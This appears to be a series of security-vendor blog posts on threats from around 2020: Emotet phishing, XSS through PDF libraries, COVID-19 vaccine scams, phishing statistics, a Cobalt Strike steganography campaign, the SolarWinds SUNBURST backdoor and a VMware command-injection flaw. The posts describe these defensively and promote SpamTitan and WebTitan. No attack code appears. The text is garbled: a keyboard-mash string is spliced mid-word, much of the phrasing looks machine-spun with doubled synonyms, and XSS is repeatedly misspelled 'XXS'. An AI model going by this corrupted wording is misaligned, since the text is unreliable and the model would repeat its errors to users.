The most recent campaign uses similar tactics to past campaigns to maximize the probability of end users clicking on a malicious Office document. The phishing emails are usually personalized to make them look more authentic, with Emotet using hijacked message threats with malicious content included. Since the emails appear to be responses to past conversations between colleagues and contacts, there is a better chance that the recipient will open the email attachment or click a malicious URL.
This campaign targets password-protected files, with the password to open the file supplied in the message text of the email. Since email security solutions cannot open these files, it is more likely that they will be sent to inboxes. The malicious documents shared in this campaign contain malicious macros. If the macros are turned on – which the user is told is necessary to view the content of the document – Emotet will be installed, after which the TrickBot Trojan will be delivered, usually followed by a ransomware variant like as Ryuk.
Earlier campaigns have not shown any additional content when the macros are turned on; however, this campaign displays an error message after the macros have been enabled instructing the user that Word experienced an mistake opening the file. This is likely to make the user think that the Word document has been corrupted. A variety of themes are used for the emails, with the most recent campaign using holiday season and COVID-19 related lures.
A review by Cofense identified several changes in the most recent campaign, including switching the malware binary from an executable (.exe) file to a Dynamic Link Library (.dll) file, which is executed using rundll32.exe. The command-and-control infrastructure has been amended and now uses binary data rather than plain text, both of which make the malware harder to spot
Firms need to be particularly careful and should act swiftly if infections are detected and should take steps to ensure their networks are safeguarded with anti-virus software, security policies, spam filters, and web filters.
A new form of hacking has been discover that allows cybercriminals to carry out cross-site scripting attacks from within PDF files.
PDF files have been a favouritContact ,dfgn.df/gm.df,gmdf,.gm./,dfmg./d,fgmdf,./gmdf,./gmdf/.gmdf,./mgdf,./mg,.df/mg,e tool of hackers for some time in order to run for phishing attacks and distribute malware. In a lot of cases emails are shared using PDF file attachments that include hyperlinks to malicious websites. By placing these URLs into the files rather instead of the body of the email message, it is more difficult got harder for security solutions to spot those malicious links.
This more recent for of hacking also includes the used of PDF files, but instead of tricking employees into handing over their login details or visiting a malicious website where malware is downloaded, the hackers attempt to obtain sensitive information included in PDF files.
The technique is similar to those deployed by hackers in web application attacks. Cross-site scripting attacks – or XXS attacks for short – normally involve injecting malicious scripts into authentic websites and applications. When a user views a website or a hacked application, the script runs. The scripts give the hackers access to user information such as cookies, session tokens, and sensitive data saved in browsers, such as passwords. Since the website or application is genuine, the web browser will not identify the script as malicious. These attacks are possible in websites and web applications where user input is used to create output without correctly validating or encoding it.
What sort of data could be stolen in such an attack? A massive amount of sensitive data is included in PDF files. PDF files are used extensively for reports, statements, logs, e-tickets, receipts, boarding passes, and a lot more. PDF files may include passport numbers, driver’s license numbers, bank account data, and a variety of other sensitive data. The presenters at the conference said that they discovered some of the largest libraries of PDF files globally were sensitive to XXS attacks.
In the most part, the flaws in PDF files that allow XXS attacks are not due to the PDF files themselves, but incorrect coding. If PDF libraries fail to properly parse code of escape characters and allow unprotected formats, they will be susceptible. Luckily, Adobe made available an update on December 9 which stops this type of security vulnerability from being targets, although firms that create PDF files must update their software and apply the update to be secured.
This is just one method way that malicious attachments can be leveraged to steal sensitive data. As was referred to earlier, malicious macros are often added to office documents, executable files are added as attachments to emails and pretend to be as legitimate files, and malicious code can be injected into a variety of different file types.
One of the best ways to secure your network from attacks via email using malicious attachments is to use an advanced email security solution that can spot not just known malware but also never-before-seen malicious code. This is an area that is a speciality of SpamTitan Email Security. SpamTitan uses dual anti-virus engines (Bitdefender/ClamAV) to block recognized malware threats and sandboxing to spot malicious code that has been placed in email attachments. Files are put through rigorous analysis in the security of the sandbox and are checked for any malicious intent.
Contact the TitanHQ to to discover more about making your organization safe from malicious emails and malware.
Hackers are attempting to use the roll our of COVID-19 vaccination programs around the world by launching a host of COVID-19 vaccine phishing campaigns in order to illegally obtain private protected data including passwords details for networks and databases and also to speed up the distribution of their malware emails.
A number of US-based government bodies have already made malwares warnings for businesses and consumers public. These agencies the Federal Bureau of Investigations (FBI), the Department of Health and Human Services’ Office of Inspector General and the Centers for Medicare and Medicaid Services.
These malware attacks will be disguised in a number of different ways. Those already identified include offers for early access to COVID-19 vaccine programmes, seeking a payment to skip the line and move to the head of the waiting list, and an offer for email recipients to register for another waiting once they hand over some private personal information – which will later be used to infiltrate personal account with contact details and financial information.
Email is the chosen vector for this COVID-19 vaccine phishing scams but it will be no surprise to see that there are also advertising being conducted across a spectrum of different websites, social media platforms, instant messaging platforms and even using phone calls or SMS messages. The vast majority of these campaigns will take aim at individual consumers but is is expected they they could infiltrate business databases should employees access any of the medium mentioned previously while using their work network – or if the email land in their corporate inboxes.
The scam emails will most of the time have links to web portals, hidden in email attachments to mask them from antivirus software, where information will be gathered that can be used to carry out fraud. In a lot of cases Office documents will be deployed to delivering malware through via malicious macros. Mostly, these emails will claim to be trusted entities or people. COVID-19 vaccine scam emails are likely to disguise themselves as healthcare providers, health insurance firms, vaccine centers, and federal, state, or local public health bodies. Since the outbreak of COVID-19 there have been many cases of fraudsters impersonating the U.S. Centers for Disease Control and Prevention (CDC) and the World Health Organization (WHO) in Covid-19 related phishing campaigns.
Recently the U.S. Department of Justice revealed that two websites have been seized that claimed to be vaccine developers. The domains were practically identical to the authentic websites of two biotechnology firms working on vaccine development. The malicious content has been deleted but there is a strong chance that there are a huge number of other domains registered and used in COVID-19 vaccine phishing scams yet to be deployed.
Alerts have also been made public in relation to the dangers of ransomware attacks that take aim to leverage the interest in COVID-19 vaccines and supply the hackers with access to databases that will allow them to launch their attacks.
There are four important measures that companies should deploy to address the danger of being tricked by these scams. Since email is widely used, it is crucial to have a strong spam filtering solution configured. Spam filters access blacklists of malicious email and IP addresses to tackle malicious emails, but since new IP addresses are always constantly being created for these hacking campaigns, it is important to opt for a solution that features machine learning. Machine learning assists in spotting phishing attacks from IP addresses that have not previously been used for malicious purposes and to discover zero-day phishing threats. Sandboxing is also crucial in the fight against zero-day malware threats that have yet to have their signatures incorporated into the virus definition lists of antivirus engines.
Even though spam filters can identify and block emails that include malicious links, a web filtering solution is also a very important tool for this. Web filters are used to manage the access to websites that employees wish to view and stops visits to malicious websites through general web browsing, redirects, and clicks on malicious links in emails. Web filters are always being updated through threat intelligence feeds to put protection in place against recently discovered malicious URLs.
Companies should not forget to conduct end user training and should constantly run refresher training sessions for staff to help them spot phishing attacks and malicious emails. Phishing simulation exercises are also good for evaluating the effectiveness of security awareness training.
Multi-factor authentication should also be implemented as an additional security measure. Should credentials be illegally obtained, multi-factor authentication will help to see to it that stolen details cannot be used to remotely log onto accounts.
Once these measures are put in place companies will be safe from the majority of malware attacks, including COVID-19 vaccine phishing attacks.
Contact the TitanHQ team as soon as you can to find out more about spam filtering, web filtering, and safeguarding your company from malware and phishing attacks.
The danger posed by phishing attacks is constant and is still the main cause of data breaches. All that is required is one member of staff to be tricked by a phishing email for threat actors to obtain the access to carry out further attacks on your group
In this update we list some key 2020 phishing statistics to raise awareness of the threat and highlight the need for businesses to rethink their current phishing security measures.
Phishing is the most straightforward way for hackers to obtain access to sensitive data and spread malware. A small amount of skill or expertise is required to conduct a successful phishing campaign and steal details or infect users with malware. The most recent figures indicate that in 2020, 22% of reported data breaches began with a phishing email and some of the largest data breaches in history have started with a phishing attack, including the 78.8 million record data breach at the health insurer Anthem Inc., and the huge Home Depot data breach in 2014 that saw the email addresses of 53 million individuals illegally taken.
Phishing can be carried out using the phone, via SMS, social media networks, or instant messaging platforms, but email is most the most common vector chosen. Around 96% of all phishing attacks take place over email. Successful phishing attacks lead to the theft of data, theft of credentials, or the installation of malware and ransomware. The cost of settling the incidents and resultant data breaches is significant. The 2020 Cost of a Data Breach Report by the Ponemon Institute/IBM Security showed that the average cost of a data breach is around $150 per impacted record with an overall cost of $3.86 million per breach. A single spear phishing attack costs around $1.6 million to address.
Staff members may think they are able to recognize phishing emails, but data from security awareness training companies show that in many cases, that confidence is not well founded. One study in 2020 showed that 30% of end users opened phishing emails, 12% of users visited a malicious link or opened the attachment in the email, and one in 8 users then shared sensitive data on phishing web pages. Remember that 78% of users said that they know they should never click on email attachments from unknown senders or click links in unsolicited emails.
The 2020 phishing statistics show phishing and spear phishing attacks are still widespread incredibly common and that phishing attacks often succeed. Another study showed that 85% of firms have been tricked by a phishing attack at least once. Phishing websites are always being designed to be used in these scams. Once a URL is confirmed as malicious and placed on a blacklist, it has often already been abandoned by the cybercriminals. In 2020, around 1.5 million new phishing URLs were identified per month.
2020 registered a huge rise in ransomware attacks. While manual ransomware attacks often see networks infiltrated thanks to exploiting flaws in firewalls, VPNs, RDP, and networking equipment, ransomware is also sent using email. Since 2016, the number of phishing emails containing ransomware has grown by over 97%.
Taking on phishing and stopping successful attacks requires a defense in depth tactic. An advanced spam filtering solution is a must to prevent phishing emails from landing inboxes. Businesses that use Office 365 often rely on the protections that come as standard with their licenses, but studies have shown that the basic level of protection supplied by Microsoft’s Exchange Online Protection (EOP) is insufficient and average at best and phishing emails are often not spotted. A third-party, solution is recommended to layer on top of Office 365 – One that incorporates machine learning to spot never before seen phishing threats. The solution should implement email authentication protocols such as DMARC, DKIM, and SPF to identify and block email impersonation attacks and outbound scanning to discover compromised inboxes.
End user training is also crucial. In the event of a phishing email landing in an inbox, employees should be shown how to identify it as such and be conditioned into reporting the danger to their IT team to ensure action can be taken to delete all instances of the threat from the email database. Web filters are also crucial for preventing the web-based component of phishing attacks and preventing employees from visiting phishing websites.
A malicious Cobalt Strike script campaign has been discovered that uses phishing emails, malicious macros, PowerShell, and steganography to take advantage of unsuspecting email recipients.
When the email first lands in an inbox it includes a legacy Word attachment (.doc) with a malicious macro that installs a PowerShell script from GitHub if it is permitted to run. That script then installs a PNG image file from the genuine image sharing service Imgur. The image includes hidden code within its pixels which can be executed with a single command to run the payload. In this instance, a Cobalt Strike script.
Cobalt Strike is a widely-implemented penetration testing tool. While it is used by security experts for legitimate security reasons, it is also of value to hackers. The tool premits beacons to be added to compromised devices which can be used to run PowerShell scripts, create web shells, escalate privileges, and provide remote access to devices. In this campaign, the hiding of the code in the image and the use of legitimate services such as Imgur and GitHub helps the hackers bypass detection.
The hiding of code within image files is known as steganography and has been implemented for many years as a way of hiding malicious code, usually in PNG files to prevent the code from being discovered. With this campaign the deception doesn’t finish there. The Cobalt Strike script includes an EICAR string that is aimed at tricking security solutions and security teams into labelling the malicious code as an antivirus payload, except contact is made with the hacker’s command and control server and instructions are recognized.
This campaign was discovered by expert ArkBird who compared the campaign to one conducted by an APT group known as Muddywater, which emerged around 2017. The threat group, aka Static kitten/Seedworm/Mercury, primarily carries out attacks on Middle eastern countries, commonly Saudi Arabia and Iraq, although the group has been known to conduct attacks on European and US targets. It is not known whether this group is to blame for the campaign.
Of course one of the most effective ways to prevent these types of attacks is by stopping the malicious email from being delivered to inboxes. A spam filter such as SpamTitan that incorporates a sandbox for reviewing attachments in safety will help to ensure that these messages do not get sent to inboxes. End user training is also recommended to ensure that employees are made aware that they should never enable macros in Word Documents sent using email.
A web filtering solution is also effective. Web filters like WebTitan can be set up to give IT teams full management over the web content that employees can access. Since GitHub is commonly used by IT expert and other workers for authentic reasons, a group-wide block on the site is not a wise move. Rather, a selective block can be implemented for groups of employees or departments that prevents GitHub and other possibly risky code sharing sites including PasteBin from being accessed, either deliberately or unintentionally, to provide an extra layer of security.
The Cybersecurity and Infrastructure Security Agency (CISA) has released an official alert warning that experienced hackers are currently exploiting SolarWinds Orion IT monitoring and management software.
The cyberattack is thought to be the work of a highly complex, evasive, nation state hacking group who invented a Trojanized strain of Orion software that has been used to deploy a backdoor into customers’ systems labelled SUNBURST.
The supply chain attack has affected approximately 18,000 customers, who are thought to have installed the Trojanized version of SolarWinds Orion and the SUNBURST backdoor. SolarWinds Orion is used by large public and private groups and government bodies.
SolarWinds customers incorporate all five branches of the U.S. military, the Pentagon, State Department, NASA and National Security Agency. Its solutions are also implemented by 425 of the 500 largest publicly traded U.S. firms. The US Treasury, US National Telecommunications and Information Administration (NTIA), and Department of Homeland Security are known to have been targeted. The campaign was first discovered by the cybersecurity company FireEye, which was also attacked as part of this attack.
The attacks began during spring 2020 when the first malicious versions of the Orion software were launched. The hackers are thought to have been active in compromised networks since that time. The malware is evasive, which is why it has taken so long to discover the threat. FireEye commented: “The malware masquerades its network traffic as the Orion Improvement Program (OIP) protocol and stores reconnaissance results within legitimate plugin configuration files allowing it to blend in with legitimate SolarWinds activity”. Once the backdoor has been put in place, the hackers move laterally and steal data.
Kevin Thompson, SolarWinds President and CEO said: “We believe that this vulnerability is the result of a highly-sophisticated, targeted, and manual supply chain attack by a nation-state”.
The hackers obtained access to SolarWinds’ software development environment and placed the backdoor code into its library in SolarWinds Orion Platform software versions 2019.4 HF 5 through 2020.2.1 HF 1, which were made public between March 2020 and June 2020.
CISA released an Emergency Directive ordering all federal civilian bodies to take swift action to block any attack in progress by immediately unlinking or powering down SolarWinds Orion products, versions 2019.4 through 2020.2.1 HF1, from their networks. The agencies have also been forbidden from “(re)joining the Windows host OS to the enterprise domain.”
All users have been told to immediately upgrade their SolarWinds Orion software to Orion Platform version 2020.2.1 HF 1. A subsequent hotfix – 2020.2.1 HF 2 – is due to be released on Tuesday and will replace the compromised component and implement other additional security measures.
If it is not possible to quickly upgrade, guidelines have been made available by SolarWinds for securing the Orion Platform. Organizations should also scan for signs of compromise. The signatures of the backdoor are being included on antivirus engines, and Microsoft has confirmed that all its antivirus products now detect the backdoor and users have been advised to complete a full scan.
SolarWinds is working alongside FireEye, the Federal Bureau of Investigation, and the intelligence community to investigate the hacking attempts. SolarWinds is also working with Microsoft to remove an attack vector that results in the compromise of targets’ Microsoft Office 365 productivity tools.
It is currently not known which group is to blame for the attack; although the Washington Post claims to have contacted sources who confirmed the attack was the work of the Russian nation state hacking group APT29 (Cozy Bear). An official representative for the Kremlin said Russia had nothing to do with the attacks, saying “Russia does not conduct offensive operations in the cyber domain.”
The U.S. National Security Agency (NSA) has released a cybersecurity advisory alert informing the public that Russian state-sponsored hackers are focusing on a flaw in VMWare virtual workspaces used to support remote working.
The flaw, labelled as CVE-2020-4006, is present in certain versions of VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector products and is being targeted to obtain access to enterprise networks and protected data on the impacted systems.
The flaw is a command-injection flaw in the administrative configurator component of the affected products. The vulnerability can be targeted remotely by a hacker with valid details and access to the administrative configurator on port 8443. If successfully taken advantage of, a hacker would be able to execute commands with unlimited privileges on the operating system and access sensitive data.
VMWare launched a patch to address the vulnerability on December 3, 2020 and also published information to help network defenders identify networks that have already been impacted, along with steps to eradicate threat actors who have already exploited the vulnerability.
The flaw may not have been allocated a high priority by system managers as it was only rated by VMWare as ‘important’ severity, with a CVSS v3 base score of 7.2 out of 10 assigned to the flaw. The relatively low severity rating as a result of the fact that a valid password must be supplied to exploit the flaw and the account is internal to the impacted range of products. However, as the NSA outlined, the Russian threat actors are already exploiting the flaw using stolen details.
In attacks reviewed by the NSA, the hackers targeted the command injection flaw, installed a web shell, followed by malicious activity where SAML authentication assertions were produced and shared to Microsoft Active Directory Federation Services (ADFS), granting access to secured data.
The best manner of stopping exploitation is to apply the VMWare patch as soon as possible. If it is not possible to apply the patch, it is important to see to it that strong, unique passwords are set to safeguard from brute force attempts to reveal passwords. The NSA also advises administrators ensure the web-based management interface is not accessible via the Internet.
Strong passwords will not stop the flaw from being successfully targeted and will not provide protection if the flaw has already been exploited. NSA said: “It is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration. Otherwise, SAML assertions could be forged, granting access to numerous resources.”
If linking up with authentication servers with ADFS, the NSA recommends following Microsoft’s best practices, especially for safeguarding SAML assertions. Multi-factor authentication should also be configured.
The NSA has released a workaround that can be used to stop exploitation until the patch can be applied and recommends reviewing and hardening configurations and monitoring federated authentication suppliers.
Unfortunately, spotting exploitation of the flaw can be tricky. The NSA explained in the advisory that “network-based indicators are unlikely to be effective at detecting exploitation since the activity occurs exclusively inside an encrypted transport layer security (TLS) tunnel associated with the web interface.
VMWare advises that all customers refer to VMSA-2020-0027 for information on this flaw.